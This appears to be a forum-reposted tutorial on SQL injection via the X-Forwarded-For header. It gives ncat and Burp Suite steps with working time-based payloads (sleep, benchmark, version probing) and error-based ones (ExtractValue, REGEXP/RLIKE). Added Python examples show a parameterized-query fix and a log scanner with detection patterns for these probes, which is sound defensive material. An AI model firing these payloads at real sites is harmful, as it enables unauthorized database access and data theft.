GreySec Forums

Full Version: [Tutorial] Request header MySQL injection using netcat and burp suite
Request header MySQL injection using netcat and burp suite

Credits: Rouge Coder
Source: IntoSec


The scope of this tutorial is not to teach SQL injection. It is only meant to give you an idea of an efficient approach to executing SQL injections through the request headers. It is expected that you, the reader, have at least some basic knowledge of request headers, SQL injection and the command line interface. If you need to learn more about SQL injection methods, please refer to tutorials written to teach this.

Verify Vulnerability

Before we begin we need to make sure that the header we're attacking is actually vulnerable. The best way to do this is to use time based injection. I like to use the ncat command for this purpose.

I first run this command...
Code:
$ echo "GET / HTTP/1.0\r\nX-Forwarded-For: x' or sleep(4) -- -\r\nConnection: close\r\n\r\n" | ncat target 80

... followed by this
Code:
$ echo "GET / HTTP/1.0\r\nX-Forwarded-For: x' or sleep(0) -- -\r\nConnection: close\r\n\r\n" | ncat target 80

If there's a large difference in the time it takes before the HTML source is printed, it means that our sleep() command was executed on the database server.

If the sleep command doesn't work, you can try using benchmark() instead:
Code:
$ echo "GET / HTTP/1.0\r\nX-Forwarded-For: x' or benchmark(15000000,md5(0x3a)) -- -\r\nConnection: close\r\n\r\n" | ncat target 80

Now that we have verified that our commands are being executed on the server, it's time to move on.
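The reason the header reaches the database at all is the pattern the probe above exploits: an application that logs the client address pastes the raw X-Forwarded-For value into its SQL text. The following is an added example, not code from the original post, and it uses an in-memory SQLite table as a stand-in for the MySQL visitor log (the table name and columns are assumptions). It shows the concatenating version beside the parameterized one, fed with the post's own probe string: the concatenated statement is handed to the SQL parser as code (SQLite has no sleep() and the trailing comment leaves the statement unbalanced, so it errors), while the bound parameter is stored verbatim as data.

```python
import sqlite3

# Constructed sample header values (not captured traffic).
BENIGN_HEADER = "203.0.113.7"
PROBE_HEADER = "x' or sleep(0) -- -"   # the post's own time-based probe


def new_db():
    """In-memory SQLite stand-in for a MySQL visitor-log table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visits (id INTEGER PRIMARY KEY, client_ip TEXT NOT NULL)")
    return conn


def build_query_unsafe(xff):
    """The defect class the tutorial targets: the header is pasted into the SQL text.
    A quote inside the header ends the string literal and the rest is parsed as SQL."""
    return "INSERT INTO visits (client_ip) VALUES ('" + xff + "')"


def store_visit_unsafe(conn, xff):
    """Vulnerable pattern: execute the concatenated statement."""
    try:
        conn.execute(build_query_unsafe(xff))
        conn.commit()
        return "stored"
    except sqlite3.Error as exc:
        # The engine tried to interpret header contents as SQL. In MySQL the
        # same text would call sleep(); here it simply fails to parse.
        return "error: " + str(exc)


def store_visit_safe(conn, xff):
    """Hardened pattern: a bound parameter is sent as data and never parsed as SQL."""
    conn.execute("INSERT INTO visits (client_ip) VALUES (?)", (xff,))
    conn.commit()
    return "stored"


def stored_ips(conn):
    """Return the logged header values in insertion order."""
    return [row[0] for row in conn.execute("SELECT client_ip FROM visits ORDER BY id")]


def demo(probe=PROBE_HEADER):
    """Run both patterns against a fresh table and collect the outcomes."""
    conn = new_db()
    return {
        "unsafe_benign": store_visit_unsafe(conn, BENIGN_HEADER),
        "unsafe_probe": store_visit_unsafe(conn, probe),
        "safe_probe": store_visit_safe(conn, probe),
        "rows": stored_ips(conn),
    }


if __name__ == "__main__":
    print(build_query_unsafe(PROBE_HEADER))
    for key, value in demo().items():
        print(key, "->", value)
```

The benign address succeeds under both patterns, which is why this class of bug survives testing with well-formed input; only the parameterized version also survives the probe, storing it as an ordinary string.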

Determine The Version

The first thing we want to do is to determine what database version we're working with. The reason for this is that we need to know whether information_schema is present or not. It is present in MySQL 5.

So how do we go about doing this? We continue our time based attack.
Code:
$ echo "GET / HTTP/1.0\r\nX-Forwarded-For: x' or if(mid(@@version,1,1)=5,sleep(4),null) -- -\r\nConnection: close\r\n\r\n" | ncat target 80

This triggers the sleep function if the first character of the version number is 5. If not, the page will load instantly.

You can now start looking for ways to attack the server.

Determine Attack Method

We have so far verified that the header is vulnerable and that the server is running MySQL 5. It's now time to determine what type of SQL injection attack we will use. We already know that it's vulnerable to time based injection. But this is the worst method that exists, so we look for other methods.

Load up Burp Suite now.

Make Burp Suite intercept the request and press Ctrl + R. This will send the request to Repeater. You will see that the tab named Repeater highlights in orange. The Repeater is divided into two parts, one to send requests and one to view the response, which makes header tampering extremely easy.

[Image: W37Hntp.png]

[Image: Ofv3jS3.png]

Now that we have our request loaded into the Repeater we tamper with the same header as we used with netcat, and it can be a good idea to send one or two basic time based injections, like the first ones we used, just to verify that the code is executed.

When that is done we can start the process of trying to generate errors. There are several methods to do this, but my favorite ones are ExtractValue(), REGEXP and RLIKE. They are short, easy to remember and take a second to write.

ExtractValue()
Code:
X-Forwarded-For: x' and ExtractValue(null,concat(0x3a,version())) -- -

REGEXP / RLIKE (RLIKE is just an alias of REGEXP)
Code:
X-Forwarded-For: x' REGEXP '(' -- -
X-Forwarded-For: x' RLIKE '(' -- -

If you get any output, start trying to see if you can use it to extract data. If you can, then you are lucky, because if you don't get any error messages, or you're not able to display anything in them, then the only thing that's left is, yes, time based injection.

I'm not going to get into any further details about this now.
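Every probe shown in this tutorial leaves a recognisable trace in the X-Forwarded-For header, which in normal traffic is nothing more than a comma-separated list of IP addresses. The following is an added example, not part of the original post, of the check a defender would run over proxy or application logs: it validates that the header is an IP list and flags the function names and comment terminators the post uses (sleep, benchmark, ExtractValue, REGEXP/RLIKE). The log lines are constructed sample data and the log format (header as the last quoted field) is an assumption.

```python
import ipaddress
import re

# Constructed log lines; the X-Forwarded-For value is assumed to be the last quoted field.
SAMPLE_LOG = """\
203.0.113.9 - - [10/Oct/2023:13:55:36 +0000] "GET / HTTP/1.0" 200 512 "198.51.100.4"
203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET / HTTP/1.0" 200 512 "x' or sleep(4) -- -"
203.0.113.9 - - [10/Oct/2023:13:55:41 +0000] "GET / HTTP/1.0" 200 512 "x' or benchmark(15000000,md5(0x3a)) -- -"
203.0.113.9 - - [10/Oct/2023:13:56:02 +0000] "GET / HTTP/1.0" 200 512 "x' and ExtractValue(null,concat(0x3a,version())) -- -"
203.0.113.9 - - [10/Oct/2023:13:56:05 +0000] "GET / HTTP/1.0" 200 512 "x' RLIKE '(' -- -"
203.0.113.9 - - [10/Oct/2023:13:57:00 +0000] "GET / HTTP/1.0" 200 512 "198.51.100.4, 10.0.0.12"
"""

# Markers for the probes the tutorial uses, matched case-insensitively.
SQL_MARKERS = {
    "time-based sleep": re.compile(r"\bsleep\s*\(", re.I),
    "time-based benchmark": re.compile(r"\bbenchmark\s*\(", re.I),
    "error-based extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "error-based regexp/rlike": re.compile(r"\b(regexp|rlike)\b", re.I),
    "quote character": re.compile(r"'"),
    "comment terminator": re.compile(r"--[\s-]|/\*"),
}

# Last double-quoted field on the line.
XFF_FIELD = re.compile(r'"([^"]*)"\s*$')


def xff_is_well_formed(value):
    """A legitimate X-Forwarded-For is a comma-separated list of IP addresses."""
    try:
        for part in value.split(","):
            ipaddress.ip_address(part.strip())
        return True
    except ValueError:
        return False


def inspect_header(value):
    """Return the list of findings for one header value (empty when it looks legitimate)."""
    findings = []
    if not xff_is_well_formed(value):
        findings.append("malformed (not an IP list)")
    for name, pattern in SQL_MARKERS.items():
        if pattern.search(value):
            findings.append(name)
    return findings


def scan_log(text):
    """Return (line_number, header_value, findings) for every suspicious line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = XFF_FIELD.search(line)
        if not m:
            continue
        findings = inspect_header(m.group(1))
        if findings:
            hits.append((lineno, m.group(1), findings))
    return hits


if __name__ == "__main__":
    for lineno, header, findings in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {header!r} -> {', '.join(findings)}")
```

The IP-list check alone catches all four probes, because none of them can pass for an address; the marker names are there so an alert says which technique from the tutorial was attempted, which tells the responder whether to look for timing anomalies or for database error text in the responses.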

Tutorial Resources
* Download burp suite: http://portswigger.net/burp/

MySQL Docs:
* ExtractValue()
* REGEXP / RLIKE
* BENCHMARK()
* SLEEP()